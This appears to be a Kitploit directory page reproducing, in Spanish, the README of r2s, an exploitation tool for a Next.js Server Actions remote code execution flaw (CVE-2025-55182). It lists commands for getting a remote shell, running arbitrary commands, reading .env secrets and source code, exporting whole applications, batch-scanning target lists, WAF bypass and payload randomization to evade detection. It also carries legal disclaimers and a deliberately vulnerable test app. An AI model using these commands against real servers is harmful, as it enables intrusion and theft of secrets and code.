Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
r2s — Herramienta avanzada de pruebas de seguridad para la evaluación de vulnerabilidades CVE-2025-55182 en aplicaciones Next.js. Incluye shell interactivo, escaneo por lotes, bypass de WAF e informes completos. | Kitploit
Herramientas/GitHubGitHub/zamdevio/r2s
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónEvasión de WAFPruebas de PenetraciónComando y Control
GitHubzamdevio/r2s

r2s

Herramienta avanzada de pruebas de seguridad para la evaluación de vulnerabilidades CVE-2025-55182 en aplicaciones Next.js. Incluye shell interactivo, escaneo por lotes, bypass de WAF e informes completos.

2hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
Sitio web

React2Shell (R2S) - Herramienta de Pruebas para CVE-2025-55182

R2S Banner Python License

Herramienta avanzada de pruebas de explotación para la evaluación de vulnerabilidades CVE-2025-55182

Características • Instalación • Uso • Entorno de Pruebas • Aviso Legal


📖 ¿Qué es R2S?

R2S (React2Shell) es una herramienta de pruebas de seguridad diseñada para ayudar a investigadores de seguridad, desarrolladores y probadores de penetración a evaluar si sus aplicaciones Next.js son vulnerables a CVE-2025-55182.

Entendiendo CVE-2025-55182

CVE-2025-55182 es una vulnerabilidad crítica que afecta a Server Actions de Next.js en ciertas versiones (por ejemplo, 16.0.5). Esta vulnerabilidad permite a los atacantes ejecutar comandos arbitrarios en el servidor a través de Server Actions asegurados incorrectamente, lo que conduce a la Ejecución Remota de Código (RCE).

R2S te ayuda a comprobar si tu aplicación tiene este problema para que puedas solucionarlo antes de que actores malintencionados lo encuentren.


⚠️ Notas Importantes

Indicador de Comandos de Windows (--windows)

⚠️ ADVERTENCIA CRÍTICA: El indicador --windows puede hacer que la herramienta FALLE al determinar la vulnerabilidad si se usa incorrectamente.

  • Comportamiento predeterminado: La herramienta usa comandos Unix/Linux (la mayoría de los servidores Next.js se ejecutan en Linux)
  • Cuándo usar --windows: Solo si estás 100% seguro de que el servidor objetivo es Windows
  • Qué sucede si te equivocas: Si usas --windows en un servidor Linux, los comandos fallarán y la herramienta puede reportar "no vulnerable" incluso si el servidor es vulnerable
  • Mejores prácticas: Deja que la herramienta detecte automáticamente la plataforma, o no uses --windows a menos que sepas que el objetivo es Windows

Ejemplo:```bash

❌ WRONG - Using --windows on a Linux server

r2s -u http://linux-server.com -t --windows

Result: Commands fail, tool may report "not vulnerable" (FALSE NEGATIVE)

✅ CORRECT - Let tool use default Unix/Linux commands

r2s -u http://linux-server.com -t

Result: Proper detection of vulnerability

root@kitploit:~
---

## ⚠️ Aviso Legal

**IMPORTANTE: LEA ESTO ANTES DE USAR ESTA HERRAMIENTA**

1. **Esta herramienta es SOLO para pruebas de seguridad LEGÍTIMAS**
   - ✅ Pruebe sus propias aplicaciones
   - ✅ Pruebe aplicaciones para las que tenga permiso por escrito
   - ✅ Fines educativos e investigación en seguridad
   - ❌ **NUNCA la use en sistemas que no sean suyos o que no tenga permiso para probar**
   - ❌ **NUNCA la use con fines maliciosos**

2. **Al usar esta herramienta, usted acepta que:**
   - Solo la usará en sistemas propios o para los que tenga permiso explícito por escrito
   - Entiende que el acceso no autorizado a sistemas informáticos es ilegal
   - Acepta toda la responsabilidad por sus acciones
   - Los autores no son responsables del mal uso de esta herramienta

3. **Consecuencias Legales:**
   - El acceso no autorizado a sistemas informáticos es un delito en la mayoría de los países
   - Podría enfrentar cargos penales, multas y prisión
   - Obtenga siempre permiso por escrito antes de realizar pruebas

4. **Esta herramienta se proporciona "AS IS" sin garantía de ningún tipo**

**Si es menor de 18 años, asegúrese de contar con supervisión y permiso de un adulto antes de usar esta herramienta.**

---

## ✨ Características

### Capacidades Principales
- 🔍 **Detección de Vulnerabilidades** - Compruebe rápidamente si un servidor es vulnerable a CVE-2025-55182
- 💻 **Shell Interactivo** - Sesión de shell interactiva completa a través de HTTPS con historial de comandos
- 📁 **Operaciones de Archivos** - Liste directorios, lea archivos y exporte archivos/archivos comprimidos
- 🔐 **Extracción de Secretos** - Intente leer los secretos de la aplicación (archivos .env, archivos de configuración)
- 📄 **Extracción de Código** - Intente leer el código fuente de la aplicación
- 🖥️ **Información del Sistema** - Recopile información del sistema operativo, nombre de host, usuario y variables de entorno

### Características Avanzadas
- 🚀 **Auto-Warming de Payloads** - Optimice automáticamente los payloads para obtener los mejores resultados
- ⚡ **Ejecución en Paralelo** - Ejecute múltiples comandos simultáneamente
- 🎲 **Aleatorización de Payloads** - Evite la detección con payloads dinámicos
- 🛠️ **Módulos de Explotación** - Sistema de módulos estilo Metasploit (env_dump, file_search, network_scan, process_list)
- 🔄 **Manejo de Redirecciones** - Siga automáticamente las redirecciones HTTP (301, 302, 303, 307, 308)
- 🎨 **Interfaz Atractiva** - Salida con código de colores para facilitar la lectura
- 📊 **Informes Exhaustivos** - Guarde informes automáticamente en formatos JSON, HTML y TXT con formateadores específicos por operación
- ⚙️ **Sistema de Configuración** - Configuración basada en JSON con panel de ajustes interactivo
- 📦 **Funcionalidad de Exportación** - Exporte archivos individuales o directorios completos de la aplicación como archivos zip
- 🔒 **Evasión de WAF** - Múltiples técnicas de evasión (⚠️ No garantizado - consulte las limitaciones más abajo)

### Informes y Registros
- 📝 **Guardado Automático de Informes** - Guarde informes automáticamente en `~/.r2s/reports/` con marcas de tiempo legibles
- 📋 **Formatos Específicos por Operación** - Diferentes formatos de informe para distintas operaciones (shell, test, secrets, etc.)
- 📜 **Historial de Comandos** - Historial de comandos persistente guardado en `~/.r2s/history`
- 🔍 **Pistas de Auditoría** - Registro detallado de todas las operaciones en `~/.r2s/logs/audit.log`
- 🎨 **Informes HTML** - Informes HTML atractivos con modo oscuro/claro, botones de copiado y bloques de código

---

## 📦 Instalación

### Opción 1: Compilar desde el Código Fuente (Recomendado)

1. **Clone el repositorio:**   ```bash
   git clone https://github.com/zamdevio/r2s.git
   cd r2s
  1. Instalar dependencias: ```bash pip install -r requirements.txt
    root@kitploit:~
  2. Compilar el binario independiente: ```bash ./build.sh
    root@kitploit:~
  3. Instalar en el sistema (opcional): ```bash sudo cp dist/r2s /usr/local/bin/ sudo chmod +x /usr/local/bin/r2s
    root@kitploit:~
  4. Limpiar artefactos de compilación (opcional): ```bash

    Remove build/, dist/, pycache/, and other build files

    ./build.sh cleanup
    root@kitploit:~

Opción 2: Usar el script de Python directamente```bash

Install dependencies

pip install -r requirements.txt

Run directly

python3 -m react2shell.main --help

Or after building:

r2s --help

root@kitploit:~
---
## 🚀 Inicio Rápido

### Prueba Básica de Vulnerabilidad```bash
# Test if a server is vulnerable
r2s -u http://localhost:3000 -t

# With verbose output for more details
r2s -u http://localhost:3000 -t -v

⚠️ Importante: No uses --windows a menos que estés seguro de que el objetivo es Windows. Usar --windows en un servidor Linux provocará falsos negativos (la herramienta puede informar "no vulnerable" incluso si el servidor es vulnerable).

Probar con la demostración en línea

Proporcionamos un entorno de pruebas seguro en **https://r2s-arena.fly.dev**:```bash

Test the online demo

r2s -u https://r2s-arena.fly.dev -t

root@kitploit:~
### Probar localmente

Consulta [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) para obtener instrucciones sobre cómo ejecutar la aplicación vulnerable localmente.

---

## 📚 Ejemplos de uso

### Referencia rápida de comandos

**Comandos más comunes:**
- `r2s -u URL -t` - Probar vulnerabilidad (el más común)
- `r2s -u URL --shell` - Iniciar shell interactivo
- `r2s --targets FILE -t` - Escaneo por lotes de múltiples objetivos
- `r2s -u URL --system-info` - Obtener información del sistema
- `r2s -u URL --secrets` - Intentar leer secretos
- `r2s -u URL --export-archive` - Exportar la aplicación completa como zip

**⚠️ Recuerda**: No uses `--windows` a menos que el objetivo sea Windows.

---

### Operaciones básicas```bash
# Test vulnerability
r2s -u http://localhost:3000 -t

# List directory contents
r2s -u http://localhost:3000 --list-dir /app

# Read files
r2s -u http://localhost:3000 --read-file .env
r2s -u http://localhost:3000 --read-file package.json

# Get system information
r2s -u http://localhost:3000 --system-info

# Execute custom commands
r2s -u http://localhost:3000 --command "whoami"
r2s -u http://localhost:3000 --command "uname -a"

Shell interactiva```bash

Start interactive shell session

r2s -u http://localhost:3000 --shell

Features:

- Arrow keys for command history (↑/↓)

- Arrow keys for cursor movement (←/→)

- Command aliases: nano/vi/vim/emacs → cat, clear → cls

- Colored file/folder output in ls

- Persistent history saved to ~/.r2s/history

- Auto-save shell session reports

root@kitploit:~
### Módulos de explotación```bash
# List available modules
r2s --list-modules

# Use a module
r2s -u http://localhost:3000 --module env_dump

# Use module with options
r2s -u http://localhost:3000 --module file_search --set pattern="*.env" --set path="/app"

# Get module information
r2s --module-info env_dump

Funcionalidad de Exportación```bash

Export a single file

r2s -u http://localhost:3000 --export src/app/page.tsx

Saved to: ~/.r2s/exports/{domain}/src/app/page.tsx

Export entire app directory as zip archive

r2s -u http://localhost:3000 --export-archive

What it does:

- Creates a zip archive of the entire app directory on the server

- Automatically excludes files matching .gitignore patterns

- Downloads the archive to your local machine

- Automatically deletes the archive from the server after download

- Saved to: ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Note: This operation may take a while for large applications

Configure export directory

r2s settings

Navigate to "export" section and set "export_dir"

root@kitploit:~
### Secretos y Extracción de Código```bash
# Attempt to read application secrets
r2s -u http://localhost:3000 --secrets
# Tries: .env, .env.local, .env.production, config.json, etc.

# Attempt to read application source code
r2s -u http://localhost:3000 --code
# Tries: src/**/*.ts, src/**/*.tsx, src/**/*.js, etc.

Escaneo por lotes (múltiples objetivos)```bash

Scan multiple targets from file (one URL per line)

r2s --targets targets.txt -t

Batch mode: no interactive prompts, auto-continue

r2s --targets targets.txt --batch -t

Scan with rate limiting (2 requests per second)

r2s --targets targets.txt -t --rate 2

Add delay between targets (1 second)

r2s --targets targets.txt -t --delay 1

Combine options for safe batch scanning

r2s --targets targets.txt --batch -t --rate 1 --delay 2

root@kitploit:~
### Opciones Avanzadas```bash
# Parallel execution (run multiple commands simultaneously)
r2s -u http://localhost:3000 --parallel 5 --command "whoami;id;uname -a"

# WAF bypass (⚠️ Not guaranteed - see limitations below)
r2s -u http://localhost:3000 -t --waf-bypass

# Auto-warm payloads (optimize payloads before execution)
r2s -u http://localhost:3000 -t --auto-warm

# Randomize payloads (evade static detection)
r2s -u http://localhost:3000 --command "whoami" --randomize

# Different header strategies
r2s -u http://localhost:3000 -t --header-strategy chrome_latest
# Options: default, chrome_latest, firefox, minimal, assetnote

# Custom timeout (0 = no timeout)
r2s -u http://localhost:3000 --command "long-running-command" --timeout 0

# Disable SSL verification
r2s -u https://target.com -t --insecure

# Rate limiting (requests per second)
r2s -u http://localhost:3000 -t --rate 2

# Delay between requests (seconds)
r2s -u http://localhost:3000 --command "whoami" --delay 1

Opciones de Proxy y Red```bash

Use HTTP proxy

r2s -u http://localhost:3000 -t --proxy http://proxy.example.com:8080

Use proxy with authentication

r2s -u http://localhost:3000 -t --proxy http://user:[email protected]:8080

Load and rotate proxies from file (one proxy per line)

r2s -u http://localhost:3000 -t --proxy-file proxies.txt

Rate limiting with proxy rotation

r2s --targets targets.txt -t --proxy-file proxies.txt --rate 1

root@kitploit:~
### Registro y Auditoría```bash
# Log all operations to specific file
r2s -u http://localhost:3000 -t --log r2s_session.log

# Create detailed audit trail (saved to ~/.r2s/logs/audit.log)
r2s -u http://localhost:3000 -t --audit

# Combine logging with batch scanning
r2s --targets targets.txt --batch -t --log batch_scan.log --audit

Configuración y Ajustes```bash

Open interactive settings panel

r2s settings

Configure:

- Report formats (JSON, HTML, TXT per operation)

- Auto-save reports (on/off)

- Export directory

- Default timeouts

- And more...

Clean up all tool data

r2s cleanup

Removes: config, history, logs, reports, exports

Uninstall the tool (standalone binaries only)

r2s uninstall

root@kitploit:~
### Informes```bash
# Reports are auto-saved to ~/.r2s/reports/ by default
# Format: {operation}_{YYYYMMDD_HHMMSS}.{json,html,txt}

# Disable auto-save
r2s -u http://localhost:3000 -t --no-report

# Save to specific location (disables auto-save)
r2s -u http://localhost:3000 -t --output /path/to/report.json

# View reports
ls ~/.r2s/reports/
cat ~/.r2s/reports/test_20251206_120000.html

🎯 Casos de Uso Comunes

1. Probando Tu Propia Aplicación```bash

Start your Next.js app

cd my-nextjs-app npm run dev

In another terminal, test it

r2s -u http://localhost:3000 -t

root@kitploit:~
### 2. Auditoría de seguridad```bash
# Comprehensive security check
r2s -u http://localhost:3000 -t --waf-bypass
r2s -u http://localhost:3000 --system-info
r2s -u http://localhost:3000 --secrets
r2s -u http://localhost:3000 --code
r2s -u http://localhost:3000 --export-archive

3. Pruebas educativas

Use la aplicación nextjs proporcionada para realizar pruebas locales seguras:```bash cd nextjs npm install npm run dev

Test in another terminal

r2s -u http://localhost:3000 -t

root@kitploit:~
Consulte [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) para obtener instrucciones detalladas.

---

## 🏗️ Arquitectura

R2S utiliza una arquitectura modular para su mantenibilidad y extensibilidad:```
react2shell/
├── main.py              # Main entry point
├── classes/             # Core classes
│   ├── detector.py     # Target detection
│   ├── executor.py     # Command execution
│   ├── modules.py      # Exploit modules system
│   ├── operations.py   # High-level operations
│   ├── payload.py      # Payload building and randomization
│   └── shell.py        # Interactive shell
├── services/            # Services
│   ├── config.py       # Configuration management (JSON)
│   ├── exporter.py     # File and archive export
│   ├── formatters.py   # Report formatters
│   ├── history.py      # Command history
│   ├── logger.py       # Logging and audit trails
│   ├── proxy.py        # Proxy management
│   └── reporter.py     # Report generation
└── utils/              # Utilities
    ├── colors.py       # Color utilities
    └── helpers.py      # Helper functions

Consulte react2shell/README.md para obtener documentación detallada sobre la arquitectura.


🧪 Entorno de pruebas

Proporcionamos un entorno de pruebas seguro llamado nextjs que puedes usar para probar la herramienta sin poner en riesgo sistemas reales.

Demostración en línea

Visita: https://r2s-arena.fly.dev

Esta es una aplicación disponible públicamente e intencionalmente vulnerable, únicamente con fines de prueba.

Pruebas locales

Consulta nextjs/README.md para obtener instrucciones sobre cómo ejecutarla localmente.

⚠️ Importante: La aplicación nextjs es intencionalmente vulnerable y NUNCA debe usarse en producción ni con datos reales.


📖 Referencia de comandos

Comandos básicos

Comandos de exportación

ComandoDescripción
--export FILE, --ex FILEExporta un único archivo del objetivo (se guarda en ~/.r2s/exports/{domain}/)
--export-archiveExporta todo el directorio de la aplicación como un archivo zip. Crea el zip en el servidor, lo descarga y luego lo elimina del servidor. Excluye los patrones de .gitignore. Se guarda en ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Comandos de módulos

ComandoDescripción
--module NAMEEjecuta un módulo de explotación
--module-list, --list-modules

Opciones avanzadas

Opciones de informes

OpciónDescripción
--output FILE, -o FILE

Opciones de red y proxy

Opciones de lotes y automatización

OpciónDescripción
--targets FILEEscanea múltiples objetivos desde un archivo (una URL por línea, admite comentarios con #)
--batchModo por lotes: omite todas las indicaciones interactivas y continúa automáticamente (útil para automatización/scripts)

Comandos especiales

ComandoDescripción
r2s settingsAbre el panel de configuración interactivo

🔧 Solución de problemas

"Error SSL"```bash

Use --insecure flag to bypass SSL verification

r2s -u https://target.com -t --insecure

root@kitploit:~
### "Error de conexión"
- Comprueba si el servidor está en ejecución
- Verifica que la URL sea correcta
- Revisa la configuración del cortafuegos
- Intenta aumentar el tiempo de espera: `--timeout 30`

### "Solicitud bloqueada"```bash
# Try WAF bypass (⚠️ Not guaranteed - see WAF Bypass Limitations below)
r2s -u https://target.com -t --waf-bypass

# Try different header strategies
r2s -u https://target.com -t --header-strategy chrome_latest
r2s -u https://target.com -t --header-strategy firefox

"No se puede determinar la vulnerabilidad" o falsos negativos

⚠️ IMPORTANTE: Indicador de comandos de Windows

Si estás obteniendo falsos negativos (la herramienta dice "no vulnerable" pero el objetivo realmente lo es), comprueba:

  1. ¿Usaste el indicador --windows?

    • El indicador --windows hace que la herramienta use comandos de Windows (PowerShell, dir, etc.)
    • Si tu objetivo es Unix/Linux (la mayoría de los servidores Next.js lo son), usar --windows hará que la herramienta FALLE
    • La herramienta intentará ejecutar comandos de Windows en un servidor Linux, lo que fallará
    • Solución: Elimina el indicador --windows (Unix/Linux es el valor predeterminado)
  2. Detección de plataforma

    • La herramienta detecta automáticamente la plataforma, pero puedes anularla
    • Usa --windows solo si estás 100% seguro de que el objetivo es Windows
    • La mayoría de las implementaciones de Next.js están en sistemas Linux/Unix
  3. Comando de prueba

    • La prueba predeterminada usa el comando Unix: echo $((41*271))
    • Con --windows, usa: powershell -c "41*271"
    • Si el servidor es Linux pero usas comandos de Windows, la prueba fallará

Ejemplo del problema:```bash

❌ WRONG - This will fail if target is Linux

r2s -u http://linux-server.com -t --windows

✅ CORRECT - Let tool auto-detect or use default (Unix/Linux)

r2s -u http://linux-server.com -t

root@kitploit:~
### Limitaciones de la evasión de WAF

**⚠️ Importante:** Las técnicas de evasión de WAF en esta herramienta **NO están garantizadas** y tienen varias limitaciones:

- **No universal**: Diferentes WAF utilizan diferentes métodos de detección. Lo que funciona para uno puede no funcionar para otro.
- **Detección estática**: Algunos WAF utilizan coincidencia de patrones estáticos que puede evadirse, pero los WAF modernos utilizan análisis de comportamiento.
- **Limitación de frecuencia**: Muchos WAF implementan limitación de frecuencia que puede bloquear intentos repetidos.
- **Aprendizaje automático**: Los WAF avanzados utilizan modelos de ML que se adaptan y aprenden de los patrones de ataque.
- **Cloudflare/AWS WAF**: Los WAF de nivel empresarial (Cloudflare, AWS WAF, etc.) son extremadamente difíciles de evadir.
- **Sin garantías**: Las técnicas de evasión son experimentales y pueden fallar contra WAF bien configurados.

**Buenas prácticas:**
- Usar la evasión de WAF como último recurso
- Probar diferentes estrategias de cabecera (`--header-strategy`)
- Combinar con `--randomize` para obtener mejores resultados
- Entender que algunos objetivos pueden ser imposibles de evadir
- Probar siempre en sistemas que poseas o para los que tengas permiso de prueba

### Problemas de compilación```bash
# Make sure Python 3.7+ is installed
python3 --version

# Install dependencies
pip install -r requirements.txt

# Clean previous build artifacts
./build.sh cleanup

# Try building again
./build.sh

Limpieza de artefactos de compilación

Para eliminar de forma segura todos los artefactos de compilación (directorios de build, archivos de caché, etc.):```bash ./build.sh cleanup

root@kitploit:~
Esto eliminará:
- `build/` directorio (archivos de compilación de PyInstaller)
- `dist/` directorio (binarios compilados)
- `__pycache__/` directorios (caché de Python, recursivamente)
- `*.pyc` archivos (bytecode de Python compilado)
- `*.pyo` archivos (bytecode de Python optimizado)
- `*.spec` archivos (archivos spec de PyInstaller)

**Nota:** Esto solo elimina artefactos de compilación, no tu código fuente. La limpieza es segura y solicitará confirmación antes de continuar.

---

## 📁 Estructura de Archivos```
r2s/
├── README.md                 # This file
├── LICENSE                   # MIT License
├── requirements.txt          # Python dependencies
├── build.sh                  # Build script for standalone binary
├── r2s_entry.py              # PyInstaller entry point
├── react2shell/              # Main package
│   ├── README.md            # Architecture documentation
│   ├── main.py              # Entry point
│   ├── classes/             # Core classes
│   ├── services/            # Services
│   └── utils/               # Utilities
└── nextjs/                   # Testing environment
    └── README.md            # Testing environment documentation

🤝 Contribuciones

¡Las contribuciones son bienvenidas! Por favor:

  1. Haz un fork del repositorio
  2. Crea una rama de funcionalidad
  3. Haz tus cambios
  4. Envía una solicitud de extracción (pull request)

Recuerda: Solo contribuye con código que ayude a realizar pruebas de seguridad legítimas.


📝 Licencia

Este proyecto está licenciado bajo la Licencia MIT: consulta el archivo LICENSE para obtener más detalles.

Sin embargo, el uso de esta herramienta está sujeto al aviso legal anterior. Usar esta herramienta para accesos no autorizados es ilegal y no está cubierto por esta licencia.


👨‍💻 Desarrollador

zamdevio

  • GitHub: https://github.com/zamdevio
  • Repositorio del proyecto: https://github.com/zamdevio/r2s

🙏 Agradecimientos

  • Investigadores de seguridad que descubrieron CVE-2025-55182
  • La comunidad de seguridad de código abierto
  • Todos los contribuidores de este proyecto

📞 Soporte

  • Problemas (Issues): GitHub Issues
  • Seguridad: Reporta los problemas de seguridad de forma responsable

⚠️ Recordatorio Final

Esta herramienta es SOLO para fines de pruebas de seguridad y educativos.

  • ✅ Siempre obtén permiso antes de probar
  • ✅ Solo prueba sistemas que poseas o para los que tengas permiso
  • ✅ Úsala de forma responsable y ética
  • ❌ Nunca la uses con fines maliciosos
  • ❌ Nunca pruebes sistemas sin permiso

¡Mantente legal, ético y seguro! 🛡️


Hecho con ❤️ para la comunidad de seguridad

⬆ Volver arriba

Descargar herramienta
ComandoDescripción
-u, --url URLURL objetivo (necesaria para la mayoría de las operaciones)
-t, --testComprueba si el servidor es vulnerable
-ld, --list-dir PATHLista el contenido del directorio
-rf, --read-file FILELee el contenido del archivo
-si, --system-infoObtiene información del sistema
-sr, --secretsIntenta leer secretos
-c, --codeIntenta leer el código fuente
-cmd, --command CMDEjecuta un comando personalizado
--shellInicia un shell interactivo
Lista los módulos disponibles
--module-info NAMEMuestra información del módulo
--set KEY=VALUEEstablece una opción del módulo
OpciónDescripción
--waf-bypassPrueba técnicas de evasión de WAF (⚠️ No garantizado: consulta las limitaciones más abajo)
--waf-bypass-size KBTamaño de datos basura para evasión de WAF en KB (predeterminado: 128)
--vercel-waf-bypassActiva técnicas de evasión de WAF específicas de Vercel
--header-strategy STRATEGYEstrategia de encabezados HTTP: default, chrome_latest, firefox, minimal, assetnote
--parallel NEjecuta N comandos en paralelo (útil para varios comandos)
--auto-warmCalienta y optimiza automáticamente los payloads antes de la ejecución
--randomizeAleatoriza los payloads para evadir la detección estática
--no-follow-redirectsNo seguir automáticamente las redirecciones HTTP (301, 302, etc.)
-k, --insecureDesactiva la verificación de certificados SSL (usar con precaución)
--timeout SECONDSTiempo de espera de la solicitud en segundos (predeterminado: 10, usa 0 para sin tiempo de espera)
--windows⚠️ ADVERTENCIA: Usa comandos de Windows en lugar de Unix/Linux. Esto puede hacer que la herramienta NO pueda determinar la vulnerabilidad si el objetivo es en realidad Unix/Linux. Usa esto solo si estás seguro de que el objetivo es Windows.
--rate RATELimita las solicitudes a RATE solicitudes por segundo (útil para escaneos por lotes)
--delay SECONDSAñade un retraso entre solicitudes en segundos (ayuda a evitar la limitación de frecuencia)
--batchModo por lotes: omite todas las indicaciones interactivas y continúa automáticamente (útil para automatización)
Guarda los resultados en un archivo específico (desactiva el guardado automático)
--no-reportDesactiva el guardado automático de informes en ~/.r2s/reports/
--log FILERegistra todas las operaciones en el archivo especificado (registro detallado de operaciones)
--auditCrea una traza de auditoría detallada (se guarda en ~/.r2s/logs/audit.log)
OpciónDescripción
--proxy URLUsa un proxy HTTP (formato: http://proxy:port o http://user:pass@proxy:port)
--proxy-file FILECarga y rota proxies desde un archivo (un proxy por línea, formato: http://proxy:port)
--rate RATELimita las solicitudes a RATE solicitudes por segundo (evita saturar el objetivo)
--delay SECONDSAñade un retraso entre solicitudes en segundos (ayuda a evitar la limitación de frecuencia)
r2s cleanup
Elimina todos los datos de R2S (config, historial, registros, informes, exportaciones)
r2s uninstallDesinstala el binario de R2S y todos los datos
r2s helpMuestra el mensaje de ayuda